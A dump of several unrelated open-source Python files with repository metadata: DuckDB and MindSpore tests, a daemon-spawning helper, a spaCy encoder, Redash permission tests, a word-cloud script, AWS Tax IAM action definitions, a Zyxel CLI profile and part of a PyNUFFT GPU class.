duckdb_conn.execute("INSERT INTO test VALUES (" + str(value) + ");")
duckdb_conn.execute("INSERT INTO test VALUES(NULL);")
check_equal(duckdb_conn)
def test_table_nulls(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("INSERT INTO test VALUES(NULL);")
check_equal(duckdb_conn)
def test_table_without_nulls(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("INSERT INTO test VALUES(1);")
check_equal(duckdb_conn)
def test_table_with_prepared_statements(self, duckdb_cursor):
if not can_run:
return
duckdb_conn = duckdb.connect()
duckdb_conn.execute("CREATE TABLE test (a INTEGER)")
duckdb_conn.execute("PREPARE s1 AS INSERT INTO test VALUES ($1), ($2 / 2)")
for value in range(10000):
duckdb_conn.execute("EXECUTE s1(" + str(value) + "," + str(value * 2) + ");")
check_equal(duckdb_conn)
def test_to_arrow_chunk_size(self, duckdb_cursor):
if not can_run:
return
duckdb_cursor = duckdb.connect()
duckdb_cursor.execute("CREATE table t as select range a from range(3000);")
relation = duckdb_cursor.table('t')
arrow_tbl = relation.arrow()
assert arrow_tbl['a'].num_chunks == 1
arrow_tbl = relation.arrow(2048)
assert arrow_tbl['a'].num_chunks == 2
|
5f70ea3c9deb7b801436279ec0a19529e36874e8
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/st/ops/gpu/test_ger_op.py
|
0669521c10f2aa11b36986c074416452ec4cfca8
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 4,402
|
py
|
test_ger_op.py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# This example should be run with multiple processes.
# Please refer to the Programming Guide > Distributed Training -> Distributed Parallel Usage Example
# on mindspore.cn and focus on the contents of these three parts: Configuring Distributed Environment
# Variables, Calling the Collective Communication Library, Running the Script.
import numpy as np
import pytest
import mindspore
from mindspore import context
from mindspore import Tensor
from mindspore.ops import operations as P
from mindspore import nn
context.set_context(mode=context.GRAPH_MODE, device_target="GPU")
class GerNet(nn.Cell):
def __init__(self):
super(GerNet, self).__init__()
self.ger = P.Ger()
def construct(self, x1, x2):
return self.ger(x1, x2)
def ger_graph(x1, x2, ms_type, nptype):
context.set_context(mode=context.GRAPH_MODE, device_target='GPU')
ger_ = GerNet()
ms_x1 = Tensor(x1, ms_type)
ms_x2 = Tensor(x2, ms_type)
ger_output = ger_(ms_x1, ms_x2)
ger_expect = np.outer(x1, x2).astype(nptype)
assert (ger_output.asnumpy() == ger_expect).all()
def ger_pynative(x1, x2, ms_type, nptype):
context.set_context(mode=context.PYNATIVE_MODE, device_target='GPU')
ger_ = GerNet()
ms_x1 = Tensor(x1, ms_type)
ms_x2 = Tensor(x2, ms_type)
ger_output = ger_(ms_x1, ms_x2)
ger_expect = np.outer(x1, x2).astype(nptype)
assert (ger_output.asnumpy() == ger_expect).all()
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp16():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float16, np.float16)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp32():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float32, np.float32)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_pynative_fp64():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_pynative(x1, x2, mindspore.float64, np.float64)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp16():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float16, np.float16)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp32():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float32, np.float32)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_ger_graph_fp64():
"""
Feature: ALL To ALL
Description: test cases for Ger
Expectation: the result match to numpy
"""
x1 = np.random.randint(-100, 100, size=10)
x2 = np.random.randint(-100, 100, size=10)
ger_graph(x1, x2, mindspore.float64, np.float64)
|
9198bff131b44d60c8ba1bdf23e3e132215ef2f5
|
653b92ea0aeedd6a4f7517933ad1dba1dbaf4375
|
/pythonscripts/daemon.py
|
ac7526d09a45090f3e202e114380d37588a10e93
|
[] |
no_license
|
lahwaacz/Scripts
|
1231d0b8914834c75a5c3346faed85036223e64d
|
a964bdb8512b11f3a921b3bc680f557ef2ec83d9
|
refs/heads/master
| 2023-09-03T11:52:44.360320
| 2023-08-29T16:29:19
| 2023-08-29T16:29:19
| 41,174,443
| 201
| 65
| null | 2020-04-10T19:41:41
| 2015-08-21T19:44:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
daemon.py
|
#! /usr/bin/env python
import os
def spawnDaemon(*args, detach_fds=True):
"""Spawn a completely detached subprocess (i.e., a daemon).
E.g. for mark:
spawnDaemon("../bin/producenotify.py", "producenotify.py", "xx")
"""
if len(args) == 0:
raise ValueError("no arguments supplied")
# fork the first time (to make a non-session-leader child process)
try:
pid = os.fork()
except OSError as e:
raise RuntimeError("1st fork failed: %s [%d]" % (e.strerror, e.errno))
if pid != 0:
# parent (calling) process is all done
return
# detach from controlling terminal (to make child a session-leader)
os.setsid()
try:
pid = os.fork()
except OSError as e:
raise RuntimeError("2nd fork failed: %s [%d]" % (e.strerror, e.errno))
raise Exception("%s [%d]" % (e.strerror, e.errno))
if pid != 0:
# child process is all done
os._exit(0)
if detach_fds:
# grandchild process now non-session-leader, detached from parent
# grandchild process must now close all open files
try:
maxfd = os.sysconf("SC_OPEN_MAX")
except (AttributeError, ValueError):
maxfd = 1024
for fd in range(maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
# redirect stdin, stdout and stderr to /dev/null
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
os.dup2(0, 1)
os.dup2(0, 2)
# and finally let's execute the executable for the daemon!
try:
os.execvp(args[0], args)
except Exception as e:
# oops, we're cut off from the world, let's just give up
os._exit(255)
|
88f83fbfaba918aefa136da6f8f61f076f24fe50
|
06d86ca0465405a7d1a64fc6dbf4980f76565e54
|
/torchnlp/encoders/text/spacy_encoder.py
|
4e2b2a6b3f3f7e10bd8af017dc911210137e4b35
|
[
"BSD-3-Clause"
] |
permissive
|
PetrochukM/PyTorch-NLP
|
22b7f2628d6545270bc36964ce4551609f84ca9f
|
53d7edcb8e0c099efce7c2ddf8cd7c44157fcac3
|
refs/heads/master
| 2023-08-05T20:15:06.954467
| 2023-07-04T21:11:26
| 2023-07-04T21:11:26
| 122,806,629
| 2,304
| 290
|
BSD-3-Clause
| 2022-07-16T23:44:23
| 2018-02-25T05:00:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,789
|
py
|
spacy_encoder.py
|
from functools import partial
from torchnlp.encoders.text.static_tokenizer_encoder import StaticTokenizerEncoder
def _tokenize(s, tokenizer):
return [w.text for w in tokenizer(s)]
class SpacyEncoder(StaticTokenizerEncoder):
""" Encodes the text using spaCy's tokenizer.
**Tokenizer Reference:**
https://spacy.io/api/tokenizer
Args:
**args: Arguments passed onto ``StaticTokenizerEncoder.__init__``.
language (string, optional): Language to use for parsing. Accepted values
are 'en', 'de', 'es', 'pt', 'fr', 'it', 'nl' and 'xx'.
For details see https://spacy.io/models/#available-models
**kwargs: Keyword arguments passed onto ``StaticTokenizerEncoder.__init__``.
Example:
>>> encoder = SpacyEncoder(["This ain't funny.", "Don't?"])
>>> encoder.encode("This ain't funny.")
tensor([5, 6, 7, 8, 9])
>>> encoder.vocab
['<pad>', '<unk>', '</s>', '<s>', '<copy>', 'This', 'ai', "n't", 'funny', '.', 'Do', '?']
>>> encoder.decode(encoder.encode("This ain't funny."))
"This ai n't funny ."
"""
def __init__(self, *args, **kwargs):
if 'tokenize' in kwargs:
raise TypeError('``SpacyEncoder`` does not take keyword argument ``tokenize``.')
try:
import spacy
except ImportError:
print("Please install spaCy: " "`pip install spacy`")
raise
# Use English as default when no language was specified
language = kwargs.get('language', 'en')
# All languages supported by spaCy can be found here:
# https://spacy.io/models/#available-models
supported_languages = ['en', 'de', 'es', 'pt', 'fr', 'it', 'nl', 'xx']
if language in supported_languages:
# Load the spaCy language model if it has been installed
try:
self.spacy = spacy.load(language, disable=['parser', 'tagger', 'ner'])
except OSError:
raise ValueError(("Language '{0}' not found. Install using "
"spaCy: `python -m spacy download {0}`").format(language))
else:
raise ValueError(
("No tokenizer available for language '%s'. " + "Currently supported are %s") %
(language, supported_languages))
super().__init__(*args, tokenize=partial(_tokenize, tokenizer=self.spacy), **kwargs)
def batch_encode(self, sequences):
# Batch tokenization is handled by ``self.spacy.pipe``
original = self.tokenize
self.tokenize = lambda sequence: [token.text for token in sequence]
return_ = super().batch_encode(self.spacy.pipe(sequences))
self.tokenize = original
return return_
|
f0e8ddac79cb28c58255040d4ec340cbecad4e19
|
70d1905e59ef92a5a082dc43e8861d86e47079f6
|
/tests/handlers/test_permissions.py
|
2e831b7f833821364885fff4fdc637a8d2b81237
|
[
"BSD-2-Clause"
] |
permissive
|
getredash/redash
|
3c34d843a82e461be3a2efa416d66f7d4c248097
|
7b722a1067397a3ecb408b2c5df07d75250fb66a
|
refs/heads/master
| 2023-09-01T18:14:21.257904
| 2023-09-01T12:11:47
| 2023-09-01T12:11:47
| 13,926,404
| 23,871
| 4,772
|
BSD-2-Clause
| 2023-09-14T11:54:15
| 2013-10-28T13:19:39
|
Python
|
UTF-8
|
Python
| false
| false
| 7,522
|
py
|
test_permissions.py
|
from redash.models import AccessPermission
from redash.permissions import ACCESS_TYPE_MODIFY
from tests import BaseTestCase
class TestObjectPermissionsListGet(BaseTestCase):
def test_returns_empty_list_when_no_permissions(self):
query = self.factory.create_query()
user = self.factory.user
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 200)
self.assertEqual({}, rv.json)
def test_returns_permissions(self):
query = self.factory.create_query()
user = self.factory.user
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=self.factory.user,
)
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 200)
self.assertIn("modify", rv.json)
self.assertEqual(user.id, rv.json["modify"][0]["id"])
def test_returns_404_for_outside_of_organization_users(self):
query = self.factory.create_query()
user = self.factory.create_user(org=self.factory.create_org())
rv = self.make_request("get", "/api/queries/{}/acl".format(query.id), user=user)
self.assertEqual(rv.status_code, 404)
class TestObjectPermissionsListPost(BaseTestCase):
def test_creates_permission_if_the_user_is_an_owner(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(200, rv.status_code)
self.assertTrue(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_returns_403_if_the_user_isnt_owner(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=other_user, data=data)
self.assertEqual(403, rv.status_code)
def test_returns_400_if_the_grantee_isnt_from_organization(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(400, rv.status_code)
def test_returns_404_if_the_user_from_different_org(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=other_user, data=data)
self.assertEqual(404, rv.status_code)
def test_accepts_only_correct_access_types(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": "random string", "user_id": other_user.id}
rv = self.make_request("post", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(400, rv.status_code)
class TestObjectPermissionsListDelete(BaseTestCase):
def test_removes_permission(self):
query = self.factory.create_query()
user = self.factory.user
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 200)
self.assertFalse(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_removes_permission_created_by_another_user(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": other_user.id}
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request(
"delete",
"/api/queries/{}/acl".format(query.id),
user=self.factory.create_admin(),
data=data,
)
self.assertEqual(rv.status_code, 200)
self.assertFalse(AccessPermission.exists(query, ACCESS_TYPE_MODIFY, other_user))
def test_returns_404_for_outside_of_organization_users(self):
query = self.factory.create_query()
user = self.factory.create_user(org=self.factory.create_org())
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 404)
def test_returns_403_for_non_owner(self):
query = self.factory.create_query()
user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=user, data=data)
self.assertEqual(rv.status_code, 403)
def test_returns_200_even_if_there_is_no_permission(self):
query = self.factory.create_query()
user = self.factory.create_user()
data = {"access_type": ACCESS_TYPE_MODIFY, "user_id": user.id}
rv = self.make_request("delete", "/api/queries/{}/acl".format(query.id), user=query.user, data=data)
self.assertEqual(rv.status_code, 200)
class TestCheckPermissionsGet(BaseTestCase):
def test_returns_true_for_existing_permission(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
AccessPermission.grant(
obj=query,
access_type=ACCESS_TYPE_MODIFY,
grantor=self.factory.user,
grantee=other_user,
)
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 200)
self.assertEqual(True, rv.json["response"])
def test_returns_false_for_existing_permission(self):
query = self.factory.create_query()
other_user = self.factory.create_user()
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 200)
self.assertEqual(False, rv.json["response"])
def test_returns_404_for_outside_of_org_users(self):
query = self.factory.create_query()
other_user = self.factory.create_user(org=self.factory.create_org())
rv = self.make_request(
"get",
"/api/queries/{}/acl/{}".format(query.id, ACCESS_TYPE_MODIFY),
user=other_user,
)
self.assertEqual(rv.status_code, 404)
|
6cf5a6caffd25301a8e5c37283a722ce50087fc1
|
fb3956e55a31e1c0bcef9827f1d6e80e751e827c
|
/heart_cloud_word.py
|
c49e75aacd8ca3e6f9c5fbd5933487079fface55
|
[] |
no_license
|
HeLiangHIT/coders_love
|
406073000b0c06b896769459f29a2dabc93906cf
|
aa927558b57fed3d48ed093094fe7636d6bdd9f1
|
refs/heads/master
| 2023-07-19T21:42:42.920961
| 2021-05-30T14:52:46
| 2021-05-30T14:52:46
| 134,127,148
| 121
| 37
| null | 2023-07-06T21:16:01
| 2018-05-20T06:56:35
|
Python
|
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
heart_cloud_word.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-05-20 18:26:50
# @Author : He Liang (heianghit@foxmail.com)
# @Link : https://github.com/HeLiangHIT
# ref : https://github.com/amueller/word_cloud
# usage: python heart_cloud_word.py --help
import jieba
import numpy
import pandas
import matplotlib.pyplot as plt
from wordcloud import WordCloud
from scipy.misc import imread
from PIL import Image, ImageDraw
from wordcloud import ImageColorGenerator
from clize import Parameter, run
# jieba.load_userdict("./data/userdict.txt") # 加载自定义词库
def cut_file_text(text_file):
# 读取文件内容并将其分词
with open(text_file, encoding='utf8') as f:
content = f.read()
segs = jieba.cut(content) # 分词
return [seg for seg in segs if len(seg) > 1 and seg != '\r\n'] # 拚弃标点符号和单字
# 读取内容
# segment = cut_file_text("./data/love_letter.txt")
# print(segment)
def word_statistics(seg, stop_words="./data/stopwords.txt"):
# 1. 去除文本中不适合的词汇, 为了方便统计词频,我们把结果保存在pandas的 DataFrame 格式方便统计
words_df = pandas.DataFrame({'segment':seg})
# words_df.head() # 查看大致内容
stopwords = pandas.read_csv(stop_words, index_col=False, quoting=3, sep="\t", names=['stopword'], encoding="utf8")
words_df = words_df[~words_df.segment.isin(stopwords.stopword)]
# 2. 词频统计
words_stat = words_df.groupby(by=['segment'])['segment'].agg({"count":numpy.size})
words_stat = words_stat.reset_index().sort_values("count", ascending=False)
# words_stat.to_csv('result.txt',sep='\t', encoding='utf-8')
return words_stat
# word_stat = word_statistics(segment)
# print(word_stat.head(20000))
def _show_and_save_img(img, file_name = None):
if file_name is not None:
img.to_file(file_name)
plt.axis("off")
plt.imshow(img)
plt.show()
# ref: https://github.com/amueller/word_cloud
def gen_word_cloud_rectangle(words_stat, font_path="./demo.ttf", background_color="white"):
# 使用matplotlib和wordcloud工具来图形化显示上述的词频统计结果
wordcloud = WordCloud(font_path=font_path, background_color=background_color)
word_frequence = {x[0]: x[1] for x in words_stat.head(20000).values}
# 最多显示20000个
wordcloud = wordcloud.fit_words(word_frequence)
return wordcloud
# img = gen_word_cloud_rectangle(word_stat)
# _show_and_save_img(img)
def gen_word_cloud_picture(words_stat, font_path="./demo.ttf", mask_file="./data/heart.jpg",
word_color_img="./data/pink.jpg", background_color="white"):
# 自定义图像背景并将词云图形化输出
mask_img = imread(mask_file)
wordcloud = WordCloud(background_color=background_color, mask=mask_img, font_path=font_path)
word_frequence = {x[0]: x[1] for x in words_stat.head(20000).values}
wordcloud = wordcloud.fit_words(word_frequence)
color_img = imread(word_color_img)
mask_color = ImageColorGenerator(color_img)
return wordcloud.recolor(color_func=mask_color)
# img = gen_word_cloud_picture(word_stat)
# _show_and_save_img(img, "./out/word_cloud.png")
def add_background(img, background="./data/background.jpg"):
# 为词云添加背景图像
new_img = img.to_image() # convert to Image
background = Image.open(background)
final_img = Image.blend(background, new_img, 1)
# 这样叠加是覆盖式的,需要专为numpy后再行判断叠加较好
final_img.show()
final_img.save("./out/word_cloud.png")
# add_background(img)
# ref: http://clize.readthedocs.io/en/stable/basics.html#collecting-all-positional-arguments
def main(*par, text_file:'t'="./data/love_letter.txt", stop_file:'s'="./data/stopwords.txt", color_img:'c'="./data/pink.jpg",
mask_file:'m'="./data/heart.jpg", out_file:'o'="./out/word_cloud.png", font_path: 'p'='./demo.ttf',):
'''生成文字云
:param text_file: text file that contain all you word
:param stop_file: the stop word which can't be considered
:param color_img: the color map img
:param mask_file: the mask img for the word
:param out_file: output file path which should with sufix of png/jpg...
:param font_path: font path
'''
segment = cut_file_text("./data/love_letter.txt")
word_stat = word_statistics(segment)
if mask_file is None:
img = gen_word_cloud_rectangle(word_stat)
_show_and_save_img(img, out_file)
else:
img = gen_word_cloud_picture(word_stat, font_path, mask_file, color_img)
_show_and_save_img(img, out_file)
if __name__ == '__main__':
run(main)
|
5572bc4c4c3412cdc7cac1bd05ec55c00b2e3c45
|
8880226d2ca1c9448c44b3e9f21226a58e61ac93
|
/awacs/tax.py
|
bf7f70c6864dd531a7e8682201f50b3c836f5ac0
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
cloudtools/awacs
|
2f82958ccc7ba2177492c29c706a5737f19dd2d1
|
c449a9637f01c26e73b827a9f8d5cc7715bbbea2
|
refs/heads/main
| 2023-08-31T00:58:28.636568
| 2023-08-28T05:13:01
| 2023-08-28T05:13:01
| 9,062,692
| 385
| 107
|
BSD-2-Clause
| 2023-08-13T23:21:39
| 2013-03-27T20:16:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
tax.py
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from typing import Optional
from .aws import Action as BaseAction
from .aws import BaseARN
service_name = "AWS Tax Settings"
prefix = "tax"
class Action(BaseAction):
def __init__(self, action: Optional[str] = None) -> None:
super().__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource: str = "", region: str = "", account: str = "") -> None:
super().__init__(
service=prefix, resource=resource, region=region, account=account
)
BatchPutTaxRegistration = Action("BatchPutTaxRegistration")
DeleteTaxRegistration = Action("DeleteTaxRegistration")
GetExemptions = Action("GetExemptions")
GetTaxInheritance = Action("GetTaxInheritance")
GetTaxInterview = Action("GetTaxInterview")
GetTaxRegistration = Action("GetTaxRegistration")
GetTaxRegistrationDocument = Action("GetTaxRegistrationDocument")
ListTaxRegistrations = Action("ListTaxRegistrations")
PutTaxInheritance = Action("PutTaxInheritance")
PutTaxInterview = Action("PutTaxInterview")
PutTaxRegistration = Action("PutTaxRegistration")
UpdateExemptions = Action("UpdateExemptions")
|
123b6059e61f69a3b762a9955073e6db78086e2f
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/sa/profiles/Zyxel/ZyNOS_EE/profile.py
|
7346e9f2ccfa274a6846c1d9947b988bda2bb512
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
profile.py
|
# ---------------------------------------------------------------------
# Vendor: Zyxel
# OS: ZyNOS_EE
# ---------------------------------------------------------------------
# Copyright (C) 2007-2011 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC Modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
name = "Zyxel.ZyNOS_EE"
pattern_password = b"Password: "
pattern_prompt = rb"^\S+?> "
pattern_more = [(rb"^-- more --.*?$", b" ")]
pattern_syntax_error = rb"^Valid commands are:"
command_exit = "exit"
enable_cli_session = False
command_save_config = "config save"
|
d8fadbec3995da0614c52b1113b47c3c90e873e2
|
23bcefab5154e9de3bba424464112a5b633e492f
|
/linalg/nufft_hsa.py
|
11b556d39e55105cd104d8093dd53aa167ee7bad
|
[
"MIT"
] |
permissive
|
jyhmiinlin/pynufft
|
8276d4de02907ba2ea168b248bf974c7a00d82e4
|
03e892ef2bc700745a9c4efd499c69df506afed5
|
refs/heads/master
| 2023-06-24T23:44:35.856229
| 2023-06-07T07:23:18
| 2023-06-07T07:23:18
| 49,985,083
| 180
| 22
|
NOASSERTION
| 2022-04-15T04:13:30
| 2016-01-19T21:41:26
|
Python
|
UTF-8
|
Python
| false
| false
| 33,094
|
py
|
nufft_hsa.py
|
"""
NUFFT HSA classes (deprecated)
=======================================
"""
from __future__ import absolute_import
import numpy
import warnings
import scipy.sparse
import numpy.fft
#import scipy.signal
import scipy.linalg
import scipy.special
from functools import wraps as _wraps
from ..src._helper import helper, helper1
class hypercube:
def __init__(self, shape, steps, invsteps, nelements, batch, dtype):
self.shape = shape
self.steps = steps
self.invsteps = invsteps
self.nelements = nelements
self.batch = batch
self.dtype = dtype
def push_cuda_context(hsa_method):
"""
Decorator to push up CUDA context to the top of the stack for current use
Add @push_cuda_context before the methods of NUFFT_hsa()
"""
@_wraps(hsa_method)
def wrapper(*args, **kwargs):
try:
args[0].thr._context.push()
except:
pass
return hsa_method(*args, **kwargs)
return wrapper
class NUFFT_hsa:
"""
NUFFT_hsa class.
Multi-coil or single-coil memory reduced NUFFT.
"""
def __init__(self, API=None, platform_number=None, device_number=None,
verbosity=0):
"""
Constructor.
:param API: The API for the heterogeneous system. API='cuda'
or API='ocl'
:param platform_number: The number of the platform found by the API.
:param device_number: The number of the device found on the platform.
:param verbosity: Defines the verbosity level, default value is 0
:type API: string
:type platform_number: integer
:type device_number: integer
:type verbosity: integer
:returns: 0
:rtype: int, float
:Example:
>>> from pynufft import NUFFT_hsa
>>> NufftObj = NUFFT_hsa(API='cuda', platform_number=0,
device_number=0, verbosity=0)
"""
warnings.warn('In the future NUFFT_hsa and NUFFT_cpu api will'
' be merged', FutureWarning)
self.dtype = numpy.complex64
self.verbosity = verbosity
import reikna.cluda as cluda
if self.verbosity > 0:
print('The choosen API by the user is ', API)
self.cuda_flag, self.ocl_flag = helper.diagnose(
verbosity=self.verbosity)
if None is API:
if self.cuda_flag is 1:
API = 'cuda'
elif self.ocl_flag is 1:
API = 'ocl'
else:
warnings.warn('No parallelization will be made since no GPU '
'device has been detected.', UserWarning)
else:
api = API
if self.verbosity > 0:
print('The used API will be ', API)
if platform_number is None:
platform_number = 0
if device_number is None:
device_number = 0
from reikna import cluda
import reikna.transformations
from reikna.cluda import functions, dtypes
try: # try to create api/platform/device using the given parameters
if 'cuda' == API:
api = cluda.cuda_api()
elif 'ocl' == API:
api = cluda.ocl_api()
platform = api.get_platforms()[platform_number]
device = platform.get_devices()[device_number]
except: # if failed, find out what's going wrong?
warnings.warn('No parallelization will be made since no GPU '
'device has been detected.', UserWarning)
# return 1
# Create context from device
self.thr = api.Thread(device) # pyopencl.create_some_context()
self.device = device # : device name
if self.verbosity > 0:
print('Using opencl or cuda = ', self.thr.api)
# """
# Wavefront: as warp in cuda. Can control the width in a workgroup
# Wavefront is required in spmv_vector as it improves data coalescence.
# see cCSR_spmv and zSparseMatVec
# """
self.wavefront = api.DeviceParameters(device).warp_size
if self.verbosity > 0:
print('Wavefront of OpenCL (as wrap of CUDA) = ', self.wavefront)
from ..src import re_subroutine # import create_kernel_sets
kernel_sets = re_subroutine.create_kernel_sets(API)
prg = self.thr.compile(kernel_sets,
render_kwds=dict(LL=str(self.wavefront)),
fast_math=False)
self.prg = prg
def set_wavefront(self, wf):
self.wavefront = int(wt)#api.DeviceParameters(device).warp_size
if self.verbosity > 0:
print('Wavefront of OpenCL (as wrap of CUDA) = ', self.wavefront)
from ..src import re_subroutine # import create_kernel_sets
kernel_sets = re_subroutine.create_kernel_sets(API)
prg = self.thr.compile(kernel_sets,
render_kwds=dict(LL=str(self.wavefront)),
fast_math=False)
self.prg = prg
def plan(self, om, Nd, Kd, Jd, ft_axes=None, batch=None, radix=None):
"""
Design the multi-coil or single-coil memory reduced interpolator.
:param om: The M off-grid locations in the frequency domain.
Normalized between [-pi, pi]
:param Nd: The matrix size of equispaced image.
Example: Nd=(256, 256) for a 2D image;
Nd = (128, 128, 128) for a 3D image
:param Kd: The matrix size of the oversampled frequency grid.
Example: Kd=(512,512) for 2D image;
